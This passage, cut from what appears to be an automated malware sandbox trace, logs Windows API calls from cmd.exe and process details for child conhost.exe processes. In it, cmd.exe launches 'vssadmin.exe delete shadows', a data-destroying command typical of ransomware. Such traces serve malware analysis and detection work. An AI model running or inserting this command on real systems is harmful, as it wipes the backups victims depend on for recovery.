lpLCData="Fri") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xeff678, cchData=32 | out: lpLCData="Sat") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xeff638, cchData=32 | out: lpLCData="Sun") returned 4 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xeff80c, cchData=8 | out: lpLCData=".") returned 2 [0184.152] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xeff7f8, cchData=8 | out: lpLCData=",") returned 2 [0184.152] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0184.157] GetProcessHeap () returned 0x3330000 [0184.157] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x0, Size=0x20c) returned 0x33377d0 [0184.157] GetConsoleTitleW (in: lpConsoleTitle=0x33377d0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0184.576] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0184.576] GetProcAddress (hModule=0x73b80000, lpProcName="CopyFileExW") returned 0x73b94330 [0184.577] GetProcAddress (hModule=0x73b80000, lpProcName="IsDebuggerPresent") returned 0x73b95930 [0184.577] GetProcAddress (hModule=0x73b80000, lpProcName="SetConsoleInputExeNameW") returned 0x74eb09d0 [0184.577] ??_V@YAXPAX@Z () returned 0x1 [0184.578] GetProcessHeap () returned 0x3330000 [0184.578] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x400a) returned 0x3338d68 [0184.579] GetProcessHeap () returned 0x3330000 [0184.579] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3338d68) returned 1 [0184.582] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0184.582] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0184.582] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0184.582] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0184.582] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0184.582] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0184.582] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0184.582] GetProcessHeap () returned 0x3330000 [0184.582] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x58) returned 0x33379e8 [0184.582] GetProcessHeap () returned 0x3330000 [0184.582] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x22) returned 0x3337a48 [0184.583] GetProcessHeap () returned 0x3330000 [0184.583] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x28) returned 0x3337a78 [0184.586] GetConsoleTitleW (in: lpConsoleTitle=0x32ff638, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0185.046] malloc (_Size=0xffce) returned 0x3672600 [0185.048] ??_V@YAXPAX@Z () returned 0x32ff3c4 [0185.048] malloc (_Size=0xffce) returned 0x36825d8 [0185.049] ??_V@YAXPAX@Z () returned 0x32ff17c [0185.052] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\vssadmin.exe")) returned 0xffffffff [0185.052] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0185.052] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0185.053] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0185.053] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0185.053] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0185.053] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0185.053] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0185.053] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0185.053] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0185.053] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0185.053] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0185.053] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0185.053] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0185.053] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0185.054] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0185.054] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0185.054] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0185.054] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0185.054] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0185.055] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0185.055] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0185.055] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0185.055] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0185.055] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0185.055] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0185.055] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0185.055] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0185.056] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0185.056] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0185.056] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0185.056] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0185.056] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0185.056] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0185.056] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0185.056] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0185.056] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0185.056] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0185.056] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0185.056] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0185.056] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0185.056] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0185.057] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0185.057] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0185.057] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0185.057] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0185.057] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0185.057] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0185.057] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0185.057] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0185.057] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0185.057] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0185.057] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0185.057] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0185.057] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0185.058] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0185.058] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0185.058] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0185.058] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0185.058] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0185.058] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0185.058] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0185.058] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0185.058] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0185.058] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0185.058] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0185.058] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0185.058] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0185.059] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0185.059] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0185.059] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0185.059] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0185.059] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0185.059] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0185.059] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0185.059] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0185.059] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0185.059] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0185.059] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0185.059] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0185.060] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0185.060] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0185.060] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0185.060] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0185.060] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0185.060] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0185.060] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0185.060] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0185.062] ??_V@YAXPAX@Z () returned 0x1 [0185.062] GetProcessHeap () returned 0x3330000 [0185.062] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xffd6) returned 0x3338d68 [0185.064] GetProcessHeap () returned 0x3330000 [0185.064] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x42) returned 0x3337aa8 [0185.064] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0185.065] malloc (_Size=0xffce) returned 0x36825d8 [0185.065] ??_V@YAXPAX@Z () returned 0x32feefc [0185.066] GetProcessHeap () returned 0x3330000 [0185.066] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x1ffa4) returned 0x3348d48 [0185.070] SetErrorMode (uMode=0x0) returned 0x0 [0185.070] SetErrorMode (uMode=0x1) returned 0x0 [0185.070] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3348d50, lpFilePart=0x32fef1c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32fef1c*="Desktop") returned 0x17 [0185.071] SetErrorMode (uMode=0x0) returned 0x1 [0185.071] GetProcessHeap () returned 0x3330000 [0185.071] RtlReAllocateHeap (Heap=0x3330000, Flags=0x0, Ptr=0x3348d48, Size=0x52) returned 0x3348d48 [0185.071] GetProcessHeap () returned 0x3330000 [0185.071] RtlSizeHeap (HeapHandle=0x3330000, Flags=0x0, MemoryPointer=0x3348d48) returned 0x52 [0185.071] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0185.072] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.075] GetProcessHeap () returned 0x3330000 [0185.075] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x1b4) returned 0x3337af8 [0185.075] GetProcessHeap () returned 0x3330000 [0185.075] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x360) returned 0x3337cb8 [0185.348] GetProcessHeap () returned 0x3330000 [0185.348] RtlReAllocateHeap (Heap=0x3330000, Flags=0x0, Ptr=0x3337cb8, Size=0x1b6) returned 0x3337cb8 [0185.348] GetProcessHeap () returned 0x3330000 [0185.348] RtlSizeHeap (HeapHandle=0x3330000, Flags=0x0, MemoryPointer=0x3337cb8) returned 0x1b6 [0185.348] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.348] GetProcessHeap () returned 0x3330000 [0185.348] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xe0) returned 0x3337e78 [0185.353] GetProcessHeap () returned 0x3330000 [0185.353] RtlReAllocateHeap (Heap=0x3330000, Flags=0x0, Ptr=0x3337e78, Size=0x76) returned 0x3337e78 [0185.353] GetProcessHeap () returned 0x3330000 [0185.353] RtlSizeHeap (HeapHandle=0x3330000, Flags=0x0, MemoryPointer=0x3337e78) returned 0x76 [0185.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.354] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x32fecc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32fecc8) returned 0xffffffff [0185.355] GetLastError () returned 0x2 [0185.355] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x32feca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32feca8) returned 0xffffffff [0185.355] GetLastError () returned 0x2 [0185.356] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.356] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x32fecc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32fecc8) returned 0xffffffff [0185.364] GetLastError () returned 0x2 [0185.364] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x32feca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32feca8) returned 0xffffffff [0185.364] GetLastError () returned 0x2 [0185.364] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0185.365] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x32fecc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32fecc8) returned 0x3337ef8 [0185.365] GetProcessHeap () returned 0x3330000 [0185.365] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x0, Size=0x14) returned 0x3334728 [0185.365] FindClose (in: hFindFile=0x3337ef8 | out: hFindFile=0x3337ef8) returned 1 [0185.366] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0185.366] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0185.366] ??_V@YAXPAX@Z () returned 0x1 [0185.366] GetConsoleTitleW (in: lpConsoleTitle=0x32ff1ac, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0185.715] InitializeProcThreadAttributeList (in: lpAttributeList=0x32ff0d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32ff0c4 | out: lpAttributeList=0x32ff0d8, lpSize=0x32ff0c4) returned 1 [0185.715] UpdateProcThreadAttribute (in: lpAttributeList=0x32ff0d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x32ff0c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32ff0d8, lpPreviousValue=0x0) returned 1 [0185.715] GetStartupInfoW (in: lpStartupInfo=0x32ff110 | out: lpStartupInfo=0x32ff110*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8c, hStdOutput=0x3a0, hStdError=0x428)) [0185.715] GetProcessHeap () returned 0x3330000 [0185.715] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0x18) returned 0x3337ef8 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0185.716] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0185.717] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0185.718] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0185.718] GetProcessHeap () returned 0x3330000 [0185.718] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3337ef8) returned 1 [0185.718] GetProcessHeap () returned 0x3330000 [0185.718] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xa) returned 0x3337ef8 [0185.719] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.722] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0185.722] SetConsoleMode (hConsoleHandle=0x3a0, dwMode=0x0) returned 0 [0185.722] _get_osfhandle (_FileHandle=0) returned 0x8c [0185.722] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0186.099] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x32ff060*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32ff0ac | out: lpCommandLine="vssadmin.exe delete shadows", lpProcessInformation=0x32ff0ac*(hProcess=0xd8, hThread=0xd4, dwProcessId=0xe1c, dwThreadId=0xf08)) returned 1 [0187.876] CloseHandle (hObject=0xd4) returned 1 [0187.876] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.876] GetProcessHeap () returned 0x3330000 [0187.876] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3336c60) returned 1 [0187.876] GetEnvironmentStringsW () returned 0x3336c60* [0187.876] GetProcessHeap () returned 0x3330000 [0187.876] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xb1a) returned 0x3334bd8 [0187.876] FreeEnvironmentStringsA (penv="=") returned 1 [0187.877] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0xffffffff) returned 0x0 [0203.998] GetExitCodeProcess (in: hProcess=0xd8, lpExitCode=0x32ff044 | out: lpExitCode=0x32ff044*=0x2) returned 1 [0204.000] CloseHandle (hObject=0xd8) returned 1 [0204.001] _vsnwprintf (in: _Buffer=0x32ff12c, _BufferCount=0x13, _Format="%08X", _ArgList=0x32ff04c | out: _Buffer="00000002") returned 8 [0204.002] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0204.004] GetProcessHeap () returned 0x3330000 [0204.004] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3334bd8) returned 1 [0204.006] GetEnvironmentStringsW () returned 0x3338218* [0204.006] GetProcessHeap () returned 0x3330000 [0204.006] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xb40) returned 0x3334bd8 [0204.007] FreeEnvironmentStringsA (penv="=") returned 1 [0204.007] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.007] GetProcessHeap () returned 0x3330000 [0204.007] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3334bd8) returned 1 [0204.007] GetEnvironmentStringsW () returned 0x3338218* [0204.007] GetProcessHeap () returned 0x3330000 [0204.007] RtlAllocateHeap (HeapHandle=0x3330000, Flags=0x8, Size=0xb40) returned 0x3334bd8 [0204.007] FreeEnvironmentStringsA (penv="=") returned 1 [0204.008] GetProcessHeap () returned 0x3330000 [0204.008] RtlFreeHeap (HeapHandle=0x3330000, Flags=0x0, BaseAddress=0x3337ef8) returned 1 [0204.008] DeleteProcThreadAttributeList (in: lpAttributeList=0x32ff0d8 | out: lpAttributeList=0x32ff0d8) [0204.008] ??_V@YAXPAX@Z () returned 0x1 [0204.009] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0204.009] SetConsoleMode (hConsoleHandle=0x3a0, dwMode=0x0) returned 0 [0204.009] _get_osfhandle (_FileHandle=1) returned 0x3a0 [0204.009] GetConsoleMode (in: hConsoleHandle=0x3a0, lpMode=0xf03890 | out: lpMode=0xf03890) returned 0 [0204.009] _get_osfhandle (_FileHandle=0) returned 0x8c [0204.009] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xf03894 | out: lpMode=0xf03894) returned 1 [0205.012] _get_osfhandle (_FileHandle=0) returned 0x8c [0205.013] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0205.637] SetConsoleInputExeNameW () returned 0x1 [0205.637] GetConsoleOutputCP () returned 0x1b5 [0206.301] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0206.301] SetThreadUILanguage (LangId=0x0) returned 0x3170409 [0206.845] exit (_Code=2) [0206.846] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 25 os_tid = 0xdf8 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5bc9e000" os_pid = "0x1314" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x1360" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 15 os_tid = 0x1318 Thread: id = 18 os_tid = 0x1114 Thread: id = 21 os_tid = 0x36c Process: id = "6" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6ebe000" os_pid = "0x10ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x135c" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 16 os_tid = 0x12a4 Thread: id = 20 os_tid = 0xfe8 Thread: id = 23 os_tid = 0xd14 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5bb9e000" os_pid = "0x10d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1280" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0xf78 Thread: id = 19 os_tid = 0xfd0 Thread: id = 22 os_tid = 0x788 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5da24000" os_pid = "0x1f4" os_integrity_level = "0x3000" os_privileges 